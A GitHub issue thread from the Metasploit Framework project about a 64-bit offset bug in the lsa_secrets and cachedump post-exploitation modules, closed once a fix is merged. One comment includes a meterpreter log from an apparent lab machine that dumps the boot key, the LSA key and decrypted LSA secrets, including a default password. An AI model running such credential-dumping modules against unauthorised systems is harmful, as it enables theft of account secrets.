### ISSUE TITLE
x64 cachedump and lsa_secrets bug

### ISSUE THREAD

**Issue by FireFart** [rapid7/metasploit-framework#4910]
Haven't verified it but it looks like we should adress this issue:
https://www.trustwave.com/Resources/SpiderLabs-Blog/Dumping-LSA-Secrets-on-NT5-x64/

**Comment by jlee-r7** [comment]
Works for me.  =/

```
meterpreter > sysinfo 
Computer        : VICTIM-C681B9C5
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > run post/windows/gather/lsa_secrets

[*] Executing module against VICTIM-C681B9C5
[*] Obtaining boot key...
[*] Boot key: c8c55aab70ccc4b4c0c5f1853a6ce923
[*] Obtaining Lsa key...
[*] Getting PolSecretEncryptionKey...
[*] XP or below system
[+] a9c1d28fa58c3436a649ebd5e17a4a3b
[*] Lsa Key: a9c1d28fa58c3436a649ebd5e17a4a3b
[+] Key: 0083343a-f925-4ed7-b1d6-d95d17a0b57b-RemoteDesktopHelpAssistantAccount
 Decrypted Value: zH&8HxlM8KpI6s

[+] Key: 0083343a-f925-4ed7-b1d6-d95d17a0b57b-RemoteDesktopHelpAssistantSID
 Decrypted Value: ZA`Wfb(

[+] Key: DefaultPassword
 Decrypted Value: msfadmin

[+] Key: DPAPI_SYSTEM
 Decrypted Value: tA~XsWx)l~%??.Y08Spt6u

[+] Key: G${ED8F4747-E13D-47bc-856B-5CEFE1A81A7F}
 Decrypted Value: {0FYg"

[+] Key: L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75
 Decrypted Value: RSA2H?iV9[A# ,u15f3^c-L0X8,1,M&H+lbin$&#dqI,vooyL

[+] Key: L$RTMTIMEBOMB_1320153D-8DA3-4e8e-B27B-0D888223A588
 Decrypted Value: h

[+] Key: L${6B3E6424-AF3E-4bff-ACB6-DA535F0DDC0A}
 Decrypted Value: 4_h+)YN;Z3:vj)9c=[Uso5`H|.)7l

[*] Writing to loot...
[*] Data saved in: /home/egypt/.msf4/loot/20150311145743_default_192.168.99.130_registry.lsa.sec_947714.txt
```

**Comment by FireFart** [comment]
The error only happens in x64 according to the post because the offset is different

**Comment by jlee-r7** [comment]
Oh, right.  Hmm.  I don't have a 64-bit XP or 2k3 box.  =(

**Comment by OJ** [comment]
It looks like @Meatballs1 pointed them at the lsa_dump feature in kiwi
which should tie them over.

I'll see if I can find time for this later today.

**Comment by FireFart** [comment]
@OJ that would be great

this should be the lines we are dealing with:
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/lsa_secrets.rb#L62
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/cachedump.rb#L52

**Comment by Meatballs1** [comment]
Fix https://dev.metasploit.com/redmine/issues/8812 whilst you're at it? :D

**Comment by jvazquez-r7** [comment]
I've put PR to fix this issue here: https://github.com/rapid7/metasploit-framework/pull/5779

**Comment by jvazquez-r7** [comment]
Clsing it since https://github.com/rapid7/metasploit-framework/pull/5779 has been landed!
